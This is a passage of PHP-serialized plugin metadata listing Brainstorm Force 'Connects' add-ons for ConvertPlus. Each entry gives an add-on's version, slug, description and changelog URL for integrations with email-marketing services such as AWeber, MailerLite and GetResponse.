Mailer\";s:10:\"short_name\";s:6:\"AWeber\";s:7:\"version\";s:5:\"2.1.7\";s:6:\"tested\";s:5:\"5.5.3\";s:4:\"slug\";s:15:\"connects-aweber\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2016/03/AWEBER.png\";s:11:\"description\";s:58:\"Integration with AWeber Email Marketing and Autoresponder.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.1.7\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:78:\"https://changelog.brainstormforce.com/convertplug-addons/aweber-version-2-1-5/\";}i:8;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:24:\"connects-campaignmonitor\";s:4:\"init\";s:53:\"connects-campaignmonitor/connects-campaignmonitor.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:28:\"connects-campaignmonitor.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:34:\"Connects - Campaign Monitor Mailer\";s:10:\"short_name\";s:16:\"Campaign Monitor\";s:7:\"version\";s:5:\"1.1.2\";s:6:\"tested\";s:3:\"5.4\";s:4:\"slug\";s:24:\"connects-campaignmonitor\";s:13:\"product_image\";s:76:\"//support.brainstormforce.com/wp-content/uploads/2016/03/CampaignMonitor.png\";s:11:\"description\";s:50:\"Integration with Campaign Monitor Email Marketing.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:88:\"https://changelog.brainstormforce.com/convertplug-addons/campaign-monitor-version-1-1-2/\";}i:9;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:18:\"connects-sendreach\";s:4:\"init\";s:41:\"connects-sendreach/connects-sendreach.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:22:\"connects-sendreach.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:27:\"Connects - SendReach Mailer\";s:10:\"short_name\";s:9:\"SendReach\";s:7:\"version\";s:5:\"1.1.2\";s:6:\"tested\";s:5:\"4.6.1\";s:4:\"slug\";s:18:\"connects-sendreach\";s:13:\"product_image\";s:73:\"//support.brainstormforce.com/wp-content/uploads/2016/03/SendReach150.png\";s:11:\"description\";s:43:\"Integration with SendReach Email Marketing.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:10;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:19:\"connects-sendinblue\";s:4:\"init\";s:43:\"connects-sendinblue/connects-sendinblue.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:23:\"connects-sendinblue.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:28:\"Connects - SendinBlue Mailer\";s:10:\"short_name\";s:10:\"SendinBlue\";s:7:\"version\";s:5:\"2.1.6\";s:6:\"tested\";s:5:\"5.6.3\";s:4:\"slug\";s:19:\"connects-sendinblue\";s:13:\"product_image\";s:71:\"//support.brainstormforce.com/wp-content/uploads/2016/03/sendinblue.png\";s:11:\"description\";s:66:\"Integrate with SendinBlue Online Email Marketing & SMS Marketing .\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.1.6\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:11;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:19:\"connects-mailerlite\";s:4:\"init\";s:43:\"connects-mailerlite/connects-mailerlite.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:23:\"connects-mailerlite.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:28:\"Connects - MailerLite Mailer\";s:10:\"short_name\";s:10:\"MailerLite\";s:7:\"version\";s:5:\"2.2.5\";s:6:\"tested\";s:5:\"5.5.1\";s:4:\"slug\";s:19:\"connects-mailerlite\";s:13:\"product_image\";s:73:\"//support.brainstormforce.com/wp-content/uploads/2016/03/MailerLite-1.png\";s:11:\"description\";s:64:\"Integrate with MailerLite Email Marketing software and Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.5\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:12;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:20:\"connects-getresponse\";s:4:\"init\";s:45:\"connects-getresponse/connects-getresponse.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:24:\"connects-getresponse.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:29:\"Connects - GetResponse Mailer\";s:10:\"short_name\";s:11:\"GetResponse\";s:7:\"version\";s:5:\"2.2.3\";s:6:\"tested\";s:5:\"5.4.2\";s:4:\"slug\";s:20:\"connects-getresponse\";s:13:\"product_image\";s:78:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Get-Response-Logo.png\";s:11:\"description\";s:72:\"Integration with GetResponse Email Marketing software and Autoresponder.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.3\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:83:\"https://changelog.brainstormforce.com/convertplug-addons/getresponse-version-2-2-2/\";}i:13;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:24:\"connects-constantcontact\";s:4:\"init\";s:53:\"connects-constantcontact/connects-constantcontact.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:28:\"connects-constantcontact.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:34:\"Connects - Constant Contact Mailer\";s:10:\"short_name\";s:16:\"Constant Contact\";s:7:\"version\";s:5:\"2.2.2\";s:6:\"tested\";s:3:\"5.7\";s:4:\"slug\";s:24:\"connects-constantcontact\";s:13:\"product_image\";s:77:\"//support.brainstormforce.com/wp-content/uploads/2016/03/constant-contact.png\";s:11:\"description\";s:59:\"Integration with Constant Contact Email Marketing Software.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:14;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:18:\"connects-totalsend\";s:4:\"init\";s:41:\"connects-totalsend/connects-totalsend.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:22:\"connects-totalsend.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:27:\"Connects - TotalSend Mailer\";s:10:\"short_name\";s:9:\"TotalSend\";s:7:\"version\";s:5:\"3.0.1\";s:6:\"tested\";s:5:\"4.6.1\";s:4:\"slug\";s:18:\"connects-totalsend\";s:13:\"product_image\";s:70:\"//support.brainstormforce.com/wp-content/uploads/2016/03/TotalSend.png\";s:11:\"description\";s:70:\"Integrate TotalSend with Connects to collect lead and email marketing.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"3.0.1\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:15;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:19:\"connects-convertkit\";s:4:\"init\";s:43:\"connects-convertkit/connects-convertkit.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:23:\"connects-convertkit.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:28:\"Connects - ConvertKit Mailer\";s:10:\"short_name\";s:10:\"ConvertKit\";s:7:\"version\";s:5:\"2.2.2\";s:6:\"tested\";s:3:\"5.4\";s:4:\"slug\";s:19:\"connects-convertkit\";s:13:\"product_image\";s:71:\"//support.brainstormforce.com/wp-content/uploads/2016/03/ConvertKit.png\";s:11:\"description\";s:55:\"Integration with ConvertKit Email Marketing Automation.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:82:\"https://changelog.brainstormforce.com/convertplug-addons/convertkit-version-2-2-2/\";}i:16;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:19:\"connects-simplycast\";s:4:\"init\";s:43:\"connects-simplycast/connects-simplycast.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:23:\"connects-simplycast.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:28:\"Connects - SimplyCast Mailer\";s:10:\"short_name\";s:10:\"SimplyCast\";s:7:\"version\";s:5:\"2.0.3\";s:6:\"tested\";s:5:\"4.7.3\";s:4:\"slug\";s:19:\"connects-simplycast\";s:13:\"product_image\";s:71:\"//support.brainstormforce.com/wp-content/uploads/2016/03/SimplYcast.png\";s:11:\"description\";s:55:\"Integration with SimplyCast Email Marketing Automation.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.0.3\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:17;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-campayn\";s:4:\"init\";s:37:\"connects-campayn/connects-campayn.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-campayn.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:25:\"Connects - Campayn Mailer\";s:10:\"short_name\";s:7:\"Campayn\";s:7:\"version\";s:5:\"2.1.1\";s:6:\"tested\";s:5:\"4.7.3\";s:4:\"slug\";s:16:\"connects-campayn\";s:13:\"product_image\";s:68:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Campayn.png\";s:11:\"description\";s:57:\"Integration with Campayn Simple Email Marketing solution.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.1.1\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:18;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:17:\"connects-mailpoet\";s:4:\"init\";s:39:\"connects-mailpoet/connects-mailpoet.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:21:\"connects-mailpoet.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - MailPoet Mailer\";s:10:\"short_name\";s:8:\"MailPoet\";s:7:\"version\";s:5:\"2.2.4\";s:6:\"tested\";s:3:\"5.8\";s:4:\"slug\";s:17:\"connects-mailpoet\";s:13:\"product_image\";s:70:\"//support.brainstormforce.com/wp-content/uploads/2016/03/MailPoet2.png\";s:11:\"description\";s:38:\"Integration with MailPoet Newsletters.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:19;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:21:\"connects-infusionsoft\";s:4:\"init\";s:47:\"connects-infusionsoft/connects-infusionsoft.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:25:\"connects-infusionsoft.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:30:\"Connects - Infusionsoft Mailer\";s:10:\"short_name\";s:12:\"Infusionsoft\";s:7:\"version\";s:5:\"2.2.4\";s:6:\"tested\";s:5:\"5.7.1\";s:4:\"slug\";s:21:\"connects-infusionsoft\";s:13:\"product_image\";s:80:\"//support.brainstormforce.com/wp-content/uploads/2016/03/InfusionSoft150x150.png\";s:11:\"description\";s:46:\"Integration with Infusionsoft Email Marketing.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.2.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:20;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-mailjet\";s:4:\"init\";s:37:\"connects-mailjet/connects-mailjet.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-mailjet.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:25:\"Connects - Mailjet Mailer\";s:10:\"short_name\";s:7:\"Mailjet\";s:7:\"version\";s:5:\"2.1.4\";s:6:\"tested\";s:3:\"5.4\";s:4:\"slug\";s:15:\"connect-mailjet\";s:13:\"product_image\";s:73:\"//support.brainstormforce.com/wp-content/uploads/2016/03/mailjet-logo.png\";s:11:\"description\";s:53:\"Integrate with Mailjet Bulk Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.1.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:21;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:23:\"connects-benchmarkemail\";s:4:\"init\";s:51:\"connects-benchmarkemail/connects-benchmarkemail.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:27:\"connects-benchmarkemail.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:33:\"Connects - Benchmark Email Mailer\";s:10:\"short_name\";s:9:\"Benchmark\";s:7:\"version\";s:5:\"2.0.4\";s:6:\"tested\";s:3:\"5.4\";s:4:\"slug\";s:23:\"connects-benchmarkemail\";s:13:\"product_image\";s:62:\"//support.brainstormforce.com/wp-content/uploads/2017/07/1.png\";s:11:\"description\";s:52:\"Integration with Benchmark Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.0.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:144:\"https://changelog.bhttps://changelog.brainstormforce.com/convertplug-addons/benchmark-email-version-2-0-4/rainstormforce.com/convertplug-addons/\";}i:22;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:20:\"connects-cleverreach\";s:4:\"init\";s:45:\"connects-cleverreach/connects-cleverreach.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:24:\"connects-cleverreach.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:29:\"Connects - CleverReach Mailer\";s:10:\"short_name\";s:11:\"CleverReach\";s:7:\"version\";s:5:\"2.3.3\";s:6:\"tested\";s:3:\"5.6\";s:4:\"slug\";s:20:\"connects-cleverreach\";s:13:\"product_image\";s:72:\"//support.brainstormforce.com/wp-content/uploads/2016/03/cleverreach.png\";s:11:\"description\";s:53:\"Integration with CleverReach Email Marketing sofware.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.3.3\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:23;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:14:\"convertplug-vc\";s:4:\"init\";s:33:\"convertplug-vc/convertplug-vc.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:18:\"convertplug-vc.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:44:\"ConvertPlus Addons for WPBakery Page Builder\";s:10:\"short_name\";s:21:\"WPBakery Page Builder\";s:7:\"version\";s:5:\"2.0.4\";s:6:\"tested\";s:3:\"5.0\";s:4:\"slug\";s:14:\"convertplug-vc\";s:13:\"product_image\";s:91:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Convert-plug-Addon-for-VC-Logo.png\";s:11:\"description\";s:51:\"Easy to use form builder for WPBakery Page Builder.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.0.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:24;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:23:\"connects-contact-form-7\";s:4:\"init\";s:51:\"connects-contact-form-7/connects-contact-form-7.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:27:\"connects-contact-form-7.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:25:\"Connects - Contact Form 7\";s:10:\"short_name\";s:14:\"Contact Form 7\";s:7:\"version\";s:5:\"1.1.2\";s:6:\"tested\";s:3:\"5.4\";s:4:\"slug\";s:23:\"connects-contact-form-7\";s:13:\"product_image\";s:75:\"//support.brainstormforce.com/wp-content/uploads/2016/03/contact-form-7.png\";s:11:\"description\";s:34:\"Collect leads from Contact Form 7.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:25;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:20:\"connects-woocommerce\";s:4:\"init\";s:50:\"connects-woocommerce/connects-woocommerce-form.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:24:\"connects-woocommerce.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:20:\"Connects WooCommerce\";s:10:\"short_name\";s:20:\"Connects WooCommerce\";s:7:\"version\";s:5:\"1.1.4\";s:6:\"tested\";s:3:\"5.7\";s:4:\"slug\";s:20:\"connects-woocommerce\";s:13:\"product_image\";s:76:\"//support.brainstormforce.com/wp-content/uploads/2017/07/woocom-checkout.png\";s:11:\"description\";s:46:\"Collect leads from WooCommerce checkout forms.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.4\";s:12:\"version_beta\";s:27:\"connects-contact-form-7.zip\";s:17:\"download_url_beta\";s:27:\"connects-contact-form-7.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:58:\"https://changelog.brainstormforce.com/connects-woocommerce\";}i:26;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:24:\"connects-wp-comment-form\";s:4:\"init\";s:53:\"connects-wp-comment-form/connects-wp-comment-form.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:28:\"connects-wp-comment-form.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - WP Comment Form\";s:10:\"short_name\";s:15:\"WP Comment Form\";s:7:\"version\";s:5:\"1.1.1\";s:6:\"tested\";s:5:\"4.7.1\";s:4:\"slug\";s:24:\"connects-wp-comment-form\";s:13:\"product_image\";s:76:\"//support.brainstormforce.com/wp-content/uploads/2016/03/WP-Comment-Form.png\";s:11:\"description\";s:42:\"Collect leads from WordPress Comment Form.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.1.1\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:27;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:29:\"connects-wp-registration-form\";s:4:\"init\";s:63:\"connects-wp-registration-form/connects-wp-registration-form.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:33:\"connects-wp-registration-form.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:31:\"Connects - WP Registration Form\";s:10:\"short_name\";s:20:\"WP Registration Form\";s:7:\"version\";s:5:\"1.0.4\";s:6:\"tested\";s:5:\"4.6.1\";s:4:\"slug\";s:29:\"connects-wp-registration-form\";s:13:\"product_image\";s:79:\"//support.brainstormforce.com/wp-content/uploads/2016/03/WP-gistration-Form.png\";s:11:\"description\";s:47:\"Collect leads from WordPress Registration Form.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:28;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:18:\"connects-ontraport\";s:4:\"init\";s:41:\"connects-ontraport/connects-ontraport.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:22:\"connects-ontraport.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:27:\"Connects - OntraPort Mailer\";s:10:\"short_name\";s:9:\"ONTRAPORT\";s:7:\"version\";s:5:\"1.0.2\";s:6:\"tested\";s:5:\"4.6.1\";s:4:\"slug\";s:18:\"connects-ontraport\";s:13:\"product_image\";s:70:\"//support.brainstormforce.com/wp-content/uploads/2016/03/ONTRAPORT.png\";s:11:\"description\";s:47:\"Integrate ONTRAPORT Email Marketing Automation.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.2\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:29;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:26:\"connects-mautic-form-addon\";s:4:\"init\";s:57:\"connects-mautic-form-addon/connects-mautic-form-addon.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:30:\"connects-mautic-form-addon.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects Mautic Form Addon\";s:10:\"short_name\";s:6:\"Mautic\";s:7:\"version\";s:5:\"1.0.4\";s:6:\"tested\";s:3:\"4.8\";s:4:\"slug\";s:26:\"connects-mautic-form-addon\";s:13:\"product_image\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2017/02/logo.png\";s:11:\"description\";s:53:\"Integration with Mautic Marketing Automation Platform\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.4\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:26:\"connects-mautic-form-addon\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:0:\"\";}i:30;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:13:\"connects-drip\";s:4:\"init\";s:31:\"connects-drip/connects-drip.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:17:\"connects-drip.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:22:\"Connects - Drip Mailer\";s:10:\"short_name\";s:4:\"Drip\";s:7:\"version\";s:5:\"1.0.3\";s:6:\"tested\";s:5:\"5.4.2\";s:4:\"slug\";s:13:\"connects-drip\";s:13:\"product_image\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2017/03/logo.png\";s:11:\"description\";s:52:\"Integration with Drip Marketing Automation Platform.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.3\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:17:\"connects-drip.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:76:\"https://changelog.brainstormforce.com/convertplug-addons/drip-version-1-0-2/\";}i:31;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:14:\"connects-sendy\";s:4:\"init\";s:33:\"connects-sendy/connects-sendy.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:18:\"connects-sendy.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:23:\"Connects - Sendy Mailer\";s:10:\"short_name\";s:5:\"Sendy\";s:7:\"version\";s:5:\"2.1.5\";s:6:\"tested\";s:3:\"5.6\";s:4:\"slug\";s:14:\"connects-sendy\";s:13:\"product_image\";s:66:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Sendy.png\";s:11:\"description\";s:46:\"Integration with Sendy Newsletter Application.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"2.1.5\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:18:\"connects-sendy.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:32;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-mailget\";s:4:\"init\";s:47:\"connects-mailget/class-smile-mailer-mailget.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-mailget.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:15:\"Connects Pabbly\";s:10:\"short_name\";s:6:\"Pabbly\";s:7:\"version\";s:5:\"1.0.2\";s:6:\"tested\";s:5:\"5.0.3\";s:4:\"slug\";s:16:\"connects-mailget\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2019/09/PABBLY.png\";s:11:\"description\";s:49:\"Integration with Pabbly Email Marketing 